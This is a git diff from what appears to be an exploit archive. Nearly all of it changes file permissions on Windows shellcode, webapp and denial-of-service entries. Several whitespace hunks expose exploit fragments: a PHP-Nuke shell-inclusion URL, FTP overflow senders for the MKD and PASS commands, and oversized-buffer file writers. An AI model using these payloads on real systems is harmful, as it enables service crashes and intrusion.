new mode 100644 diff --git a/platforms/win_x86/shellcode/13565.asm b/platforms/win_x86/shellcode/13565.asm old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13569.asm b/platforms/win_x86/shellcode/13569.asm old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13571.c b/platforms/win_x86/shellcode/13571.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13574.c b/platforms/win_x86/shellcode/13574.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13595.c b/platforms/win_x86/shellcode/13595.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13614.c b/platforms/win_x86/shellcode/13614.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13615.c b/platforms/win_x86/shellcode/13615.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13630.c b/platforms/win_x86/shellcode/13630.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13631.c b/platforms/win_x86/shellcode/13631.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13635.txt b/platforms/win_x86/shellcode/13635.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13636.c b/platforms/win_x86/shellcode/13636.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13639.c b/platforms/win_x86/shellcode/13639.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13642.txt b/platforms/win_x86/shellcode/13642.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13647.txt b/platforms/win_x86/shellcode/13647.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13699.txt b/platforms/win_x86/shellcode/13699.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/14288.asm b/platforms/win_x86/shellcode/14288.asm old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/14873.asm b/platforms/win_x86/shellcode/14873.asm old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/15063.c b/platforms/win_x86/shellcode/15063.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/15202.c b/platforms/win_x86/shellcode/15202.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/15203.c b/platforms/win_x86/shellcode/15203.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/15879.txt b/platforms/win_x86/shellcode/15879.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/16283.txt b/platforms/win_x86/shellcode/16283.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/17545.txt b/platforms/win_x86/shellcode/17545.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/35793.txt b/platforms/win_x86/shellcode/35793.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/36779.c b/platforms/win_x86/shellcode/36779.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/36780.c b/platforms/win_x86/shellcode/36780.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/37664.c b/platforms/win_x86/shellcode/37664.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/37758.c b/platforms/win_x86/shellcode/37758.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/39519.c b/platforms/win_x86/shellcode/39519.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/39754.txt b/platforms/win_x86/shellcode/39754.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/39900.c b/platforms/win_x86/shellcode/39900.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/39914.c b/platforms/win_x86/shellcode/39914.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/40005.c b/platforms/win_x86/shellcode/40005.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/40094.c b/platforms/win_x86/shellcode/40094.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/40175.c b/platforms/win_x86/shellcode/40175.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/40245.c b/platforms/win_x86/shellcode/40245.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/40246.c b/platforms/win_x86/shellcode/40246.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/40259.c b/platforms/win_x86/shellcode/40259.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/40334.c b/platforms/win_x86/shellcode/40334.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/40352.c b/platforms/win_x86/shellcode/40352.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/40363.c b/platforms/win_x86/shellcode/40363.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/40560.asm b/platforms/win_x86/shellcode/40560.asm old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/41381.c b/platforms/win_x86/shellcode/41381.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/41467.c b/platforms/win_x86/shellcode/41467.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/41481.asm b/platforms/win_x86/shellcode/41481.asm old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/41581.c b/platforms/win_x86/shellcode/41581.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/webapps/14628.txt b/platforms/win_x86/webapps/14628.txt old mode 100755 new mode 100644 index 913d24199..282d2c288 --- a/platforms/win_x86/webapps/14628.txt +++ b/platforms/win_x86/webapps/14628.txt @@ -8,7 +8,4 @@ Exploit: http://target/PHP-Nuke-8.1-seo-Arabic/PHP-Nuke-8.1-seo-Arabic/html/main Exploit: http://target/PHP-Nuke-8.1-seo-Arabic/PHP-Nuke-8.1-seo-Arabic/html/index.php?ThemeSel=[shell]____________________________________________ -A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers - - - \ No newline at end of file +A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers \ No newline at end of file diff --git a/platforms/win_x86/webapps/15100.txt b/platforms/win_x86/webapps/15100.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/webapps/15102.txt b/platforms/win_x86/webapps/15102.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/webapps/15128.txt b/platforms/win_x86/webapps/15128.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1000.cpp b/platforms/windows/dos/1000.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10091.txt b/platforms/windows/dos/10091.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10092.txt b/platforms/windows/dos/10092.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10103.txt b/platforms/windows/dos/10103.txt old mode 100755 new mode 100644 index 52b4566e1..32fe7b5ed --- a/platforms/windows/dos/10103.txt +++ b/platforms/windows/dos/10103.txt @@ -35,4 +35,4 @@ funkcja: jar50 Nie kochamy Kubusia Puchatka :) -<img src="jar:news://!/"> \ No newline at end of file +<img src="jar:news://!/"> \ No newline at end of file diff --git a/platforms/windows/dos/10106.c b/platforms/windows/dos/10106.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10164.c b/platforms/windows/dos/10164.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10176.txt b/platforms/windows/dos/10176.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10190.txt b/platforms/windows/dos/10190.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10204.txt b/platforms/windows/dos/10204.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10208.txt b/platforms/windows/dos/10208.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10210.txt b/platforms/windows/dos/10210.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10221.txt b/platforms/windows/dos/10221.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10223.txt b/platforms/windows/dos/10223.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1024.html b/platforms/windows/dos/1024.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1025.html b/platforms/windows/dos/1025.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1027.c b/platforms/windows/dos/1027.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10343.txt b/platforms/windows/dos/10343.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10377.txt b/platforms/windows/dos/10377.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10489.txt b/platforms/windows/dos/10489.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10593.txt b/platforms/windows/dos/10593.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10603.c b/platforms/windows/dos/10603.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1065.c b/platforms/windows/dos/1065.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1067.cpp b/platforms/windows/dos/1067.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10879.html b/platforms/windows/dos/10879.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1090.cpp b/platforms/windows/dos/1090.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/10920.cpp b/platforms/windows/dos/10920.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1093.c b/platforms/windows/dos/1093.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1101.c b/platforms/windows/dos/1101.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11021.txt b/platforms/windows/dos/11021.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11034.txt b/platforms/windows/dos/11034.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1104.cpp b/platforms/windows/dos/1104.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1105.c b/platforms/windows/dos/1105.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11062.txt b/platforms/windows/dos/11062.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11064.txt b/platforms/windows/dos/11064.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11065.html b/platforms/windows/dos/11065.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11070.txt b/platforms/windows/dos/11070.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11095.txt b/platforms/windows/dos/11095.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/111.c b/platforms/windows/dos/111.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1110.txt b/platforms/windows/dos/1110.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11103.html b/platforms/windows/dos/11103.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11149.c b/platforms/windows/dos/11149.c old mode 100755 new mode 100644 index 5d590ef29..9df8b4e3c --- a/platforms/windows/dos/11149.c +++ b/platforms/windows/dos/11149.c @@ -96,5 +96,4 @@ void print(char* msg) { printf("\n[*]%s\n",msg); - } - \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/windows/dos/11150.txt b/platforms/windows/dos/11150.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1116.c b/platforms/windows/dos/1116.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11176.txt b/platforms/windows/dos/11176.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11182.txt b/platforms/windows/dos/11182.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11190.txt b/platforms/windows/dos/11190.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11192.txt b/platforms/windows/dos/11192.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11195.html b/platforms/windows/dos/11195.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11196.html b/platforms/windows/dos/11196.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11214.html b/platforms/windows/dos/11214.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11217.txt b/platforms/windows/dos/11217.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11245.txt b/platforms/windows/dos/11245.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11247.txt b/platforms/windows/dos/11247.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1126.c b/platforms/windows/dos/1126.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11260.txt b/platforms/windows/dos/11260.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1127.cpp b/platforms/windows/dos/1127.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11276.txt b/platforms/windows/dos/11276.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1129.c b/platforms/windows/dos/1129.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11342.txt b/platforms/windows/dos/11342.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11347.html b/platforms/windows/dos/11347.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11363.c b/platforms/windows/dos/11363.c old mode 100755 new mode 100644 index 7eb2b5d5e..ff539f417 --- a/platforms/windows/dos/11363.c +++ b/platforms/windows/dos/11363.c @@ -7018,4 +7018,4 @@ void exploit(char*,char*); void print(char* msg) { printf("[*]%s\n",msg); - } \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/windows/dos/11392.c b/platforms/windows/dos/11392.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11407.txt b/platforms/windows/dos/11407.txt old mode 100755 new mode 100644 index a43daa743..9b513206c --- a/platforms/windows/dos/11407.txt +++ b/platforms/windows/dos/11407.txt @@ -81,4 +81,4 @@ browseui!SHOpenFolderWindow+22c 00162ca8 00000000 00000000 shdocvw!IEWinMain+133 001523ba 00000001 0140d0b8 iexplore!WinMainT+2de 00400000 00000000 001523ba iexplore!_ModuleEntry+99 0140d0b8 00000018 7ffdf000 -kernel32!BaseProcessStart+23 00402451 00000000 78746341 \ No newline at end of file +kernel32!BaseProcessStart+23 00402451 00000000 78746341 \ No newline at end of file diff --git a/platforms/windows/dos/1143.sys b/platforms/windows/dos/1143.sys old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11432.txt b/platforms/windows/dos/11432.txt old mode 100755 new mode 100644 index 2d1533b09..7e198a73a --- a/platforms/windows/dos/11432.txt +++ b/platforms/windows/dos/11432.txt @@ -69,4 +69,4 @@ asheesh(); ======================================================================================================================== -#If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file +#If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/platforms/windows/dos/11438.txt b/platforms/windows/dos/11438.txt old mode 100755 new mode 100644 index eb3af3074..0235232a3 --- a/platforms/windows/dos/11438.txt +++ b/platforms/windows/dos/11438.txt @@ -80,4 +80,4 @@ asheesh(); -#If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file +#If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/platforms/windows/dos/11469.py b/platforms/windows/dos/11469.py index 97219fd8e..c43d3eabd 100755 --- a/platforms/windows/dos/11469.py +++ b/platforms/windows/dos/11469.py @@ -66,4 +66,4 @@ s.recv(1024) s.send('MKD ' + buffer + '\r\n') s.recv(1024) s.send('QUIT\r\n') -s.close \ No newline at end of file +s.close \ No newline at end of file diff --git a/platforms/windows/dos/11492.html b/platforms/windows/dos/11492.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11532.html b/platforms/windows/dos/11532.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1156.c b/platforms/windows/dos/1156.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11617.txt b/platforms/windows/dos/11617.txt old mode 100755 new mode 100644 index 8c6d23ed8..1beccf06b --- a/platforms/windows/dos/11617.txt +++ b/platforms/windows/dos/11617.txt @@ -88,4 +88,4 @@ You came empty handed, you will leave empty handed. What is yours today, belonge Tum khaali haath aaye, khaali haath chale. Jo aaj tumhara hain, wao kal kisi aur ka tha, parso kisi aur ka hoga. Tum isse apna samajhkar magna ho rahe ho,bus yahi prasannatha tumhare dukhon ka kaaran hain. -#If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file +#If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/platforms/windows/dos/11622.php b/platforms/windows/dos/11622.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11632.txt b/platforms/windows/dos/11632.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11639.txt b/platforms/windows/dos/11639.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11734.py b/platforms/windows/dos/11734.py index 9ec5a8af1..15574b4ac 100755 --- a/platforms/windows/dos/11734.py +++ b/platforms/windows/dos/11734.py @@ -139,4 +139,4 @@ s.send('USER test\r\n') s.recv(1024) s.send('PASS ' + buffer + '\r\n') s.recv(1024) -s.close \ No newline at end of file +s.close \ No newline at end of file diff --git a/platforms/windows/dos/11803.txt b/platforms/windows/dos/11803.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11838.php b/platforms/windows/dos/11838.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1192.cpp b/platforms/windows/dos/1192.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/11987.txt b/platforms/windows/dos/11987.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1199.c b/platforms/windows/dos/1199.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12011.txt b/platforms/windows/dos/12011.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12025.php b/platforms/windows/dos/12025.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12030.html b/platforms/windows/dos/12030.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12032.html b/platforms/windows/dos/12032.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12080.txt b/platforms/windows/dos/12080.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12081.php b/platforms/windows/dos/12081.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12096.txt b/platforms/windows/dos/12096.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1218.c b/platforms/windows/dos/1218.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12201.html b/platforms/windows/dos/12201.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12204.html b/platforms/windows/dos/12204.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12205.html b/platforms/windows/dos/12205.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12206.html b/platforms/windows/dos/12206.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12207.html b/platforms/windows/dos/12207.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12208.html b/platforms/windows/dos/12208.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12294.txt b/platforms/windows/dos/12294.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12302.html b/platforms/windows/dos/12302.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12336.c b/platforms/windows/dos/12336.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12337.c b/platforms/windows/dos/12337.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12341.txt b/platforms/windows/dos/12341.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1235.c b/platforms/windows/dos/1235.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12356.c b/platforms/windows/dos/12356.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1239.c b/platforms/windows/dos/1239.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12425.html b/platforms/windows/dos/12425.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12431.html b/platforms/windows/dos/12431.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12437.html b/platforms/windows/dos/12437.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12477.txt b/platforms/windows/dos/12477.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12487.html b/platforms/windows/dos/12487.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12492.html b/platforms/windows/dos/12492.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12518.pl b/platforms/windows/dos/12518.pl index db6cc7e53..de6a27d3a 100755 --- a/platforms/windows/dos/12518.pl +++ b/platforms/windows/dos/12518.pl @@ -64,4 +64,4 @@ open(file , ">", "paint.jpg"); print file $PoC; -close(file); \ No newline at end of file +close(file); \ No newline at end of file diff --git a/platforms/windows/dos/12541.php b/platforms/windows/dos/12541.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1255.html b/platforms/windows/dos/1255.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12564.txt b/platforms/windows/dos/12564.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12578.c b/platforms/windows/dos/12578.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12602.txt b/platforms/windows/dos/12602.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12605.html b/platforms/windows/dos/12605.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12650.txt b/platforms/windows/dos/12650.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12655.txt b/platforms/windows/dos/12655.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1269.c b/platforms/windows/dos/1269.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12704.txt b/platforms/windows/dos/12704.txt old mode 100755 new mode 100644 index 99a1a0451..ac9e206c3 --- a/platforms/windows/dos/12704.txt +++ b/platforms/windows/dos/12704.txt @@ -16,4 +16,4 @@ $buff="A" x 5000; open (myfile , ">>sniper.rm"); print myfile $buff; -close (myfile); \ No newline at end of file +close (myfile); \ No newline at end of file diff --git a/platforms/windows/dos/1271.c b/platforms/windows/dos/1271.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12752.c b/platforms/windows/dos/12752.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12753.c b/platforms/windows/dos/12753.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1276.html b/platforms/windows/dos/1276.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1281.c b/platforms/windows/dos/1281.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1282.c b/platforms/windows/dos/1282.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1283.c b/platforms/windows/dos/1283.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1284.c b/platforms/windows/dos/1284.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1285.c b/platforms/windows/dos/1285.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/12852.txt b/platforms/windows/dos/12852.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1286.c b/platforms/windows/dos/1286.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1287.c b/platforms/windows/dos/1287.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/13.c b/platforms/windows/dos/13.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1328.c b/platforms/windows/dos/1328.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1336.cpp b/platforms/windows/dos/1336.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1339.c b/platforms/windows/dos/1339.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1341.c b/platforms/windows/dos/1341.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1343.c b/platforms/windows/dos/1343.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1346.c b/platforms/windows/dos/1346.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1362.html b/platforms/windows/dos/1362.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1368.cpp b/platforms/windows/dos/1368.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1371.c b/platforms/windows/dos/1371.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1372.html b/platforms/windows/dos/1372.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1376.c b/platforms/windows/dos/1376.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/13872.txt b/platforms/windows/dos/13872.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/13887.c b/platforms/windows/dos/13887.c old mode 100755 new mode 100644 index 1c8a766e9..0229e82fd --- a/platforms/windows/dos/13887.c +++ b/platforms/windows/dos/13887.c @@ -260,5 +260,4 @@ } void copy_str(i8* v,i8* w,i32 len){ memcpy(v, w, len); - } - \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/windows/dos/13888.c b/platforms/windows/dos/13888.c old mode 100755 new mode 100644 index f1988415a..089bd42bf --- a/platforms/windows/dos/13888.c +++ b/platforms/windows/dos/13888.c @@ -165,6 +165,4 @@ void error_handle(void){ perror("\nError"); exit(1); - } - - \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/windows/dos/1389.html b/platforms/windows/dos/1389.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/13919.c b/platforms/windows/dos/13919.c old mode 100755 new mode 100644 index d55d2b0f8..015d14115 --- a/platforms/windows/dos/13919.c +++ b/platforms/windows/dos/13919.c @@ -1615,5 +1615,4 @@ void error_handle(){ perror("\nError"); exit(1); - } - \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/windows/dos/13920.c b/platforms/windows/dos/13920.c old mode 100755 new mode 100644 index 13b751beb..f36f2ab36 --- a/platforms/windows/dos/13920.c +++ b/platforms/windows/dos/13920.c @@ -192,4 +192,4 @@ for(i=0;i<com;i++){ printf("%s\n",help[i]); } - } \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/windows/dos/13921.c b/platforms/windows/dos/13921.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1394.html b/platforms/windows/dos/1394.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/13958.txt b/platforms/windows/dos/13958.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/13959.c b/platforms/windows/dos/13959.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1396.cpp b/platforms/windows/dos/1396.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14072.c b/platforms/windows/dos/14072.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14156.txt b/platforms/windows/dos/14156.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1416.c b/platforms/windows/dos/1416.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1422.c b/platforms/windows/dos/1422.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1423.html b/platforms/windows/dos/1423.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14236.txt b/platforms/windows/dos/14236.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14282.txt b/platforms/windows/dos/14282.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14286.txt b/platforms/windows/dos/14286.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14295.html b/platforms/windows/dos/14295.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14344.c b/platforms/windows/dos/14344.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14346.txt b/platforms/windows/dos/14346.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14349.html b/platforms/windows/dos/14349.html old mode 100755 new mode 100644 index 2eca136be..0362a04ef --- a/platforms/windows/dos/14349.html +++ b/platforms/windows/dos/14349.html @@ -28,8 +28,4 @@ ctx.getImageData(0,0,0x20000,0x20000); Original Advisory: -http://pouya.info/blog/userfiles/vul/OperaCC.pdf - - - - \ No newline at end of file +http://pouya.info/blog/userfiles/vul/OperaCC.pdf \ No newline at end of file diff --git a/platforms/windows/dos/14372.txt b/platforms/windows/dos/14372.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14413.txt b/platforms/windows/dos/14413.txt old mode 100755 new mode 100644 index 3f51d0ee9..560dadfe6 --- a/platforms/windows/dos/14413.txt +++ b/platforms/windows/dos/14413.txt @@ -111,4 +111,4 @@ kernel32!BaseThreadStart+37 3e25e4fc 056a5cf8 00000000 The assembly instruction at kernel32!RaiseException+53 in C:\WINDOWS\system32\kernel32.dll from Microsoft Corporation has caused an unknown exception (0xc06d007e) on thread 33 -This exception originated from MCPS!DllGetClassObject+6db1. \ No newline at end of file +This exception originated from MCPS!DllGetClassObject+6db1. \ No newline at end of file diff --git a/platforms/windows/dos/14414.txt b/platforms/windows/dos/14414.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14424.txt b/platforms/windows/dos/14424.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14477.txt b/platforms/windows/dos/14477.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14484.html b/platforms/windows/dos/14484.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14504.html b/platforms/windows/dos/14504.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14533.txt b/platforms/windows/dos/14533.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14545.txt b/platforms/windows/dos/14545.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14593.htm b/platforms/windows/dos/14593.htm old mode 100755 new mode 100644 index 5346a44d2..c03f11d1f --- a/platforms/windows/dos/14593.htm +++ b/platforms/windows/dos/14593.htm @@ -20,5 +20,4 @@ target.InitLicenKeys arg1 ,nseh ,seh ,arg4 ,arg5 </script> -hadji samir - \ No newline at end of file +hadji samir \ No newline at end of file diff --git 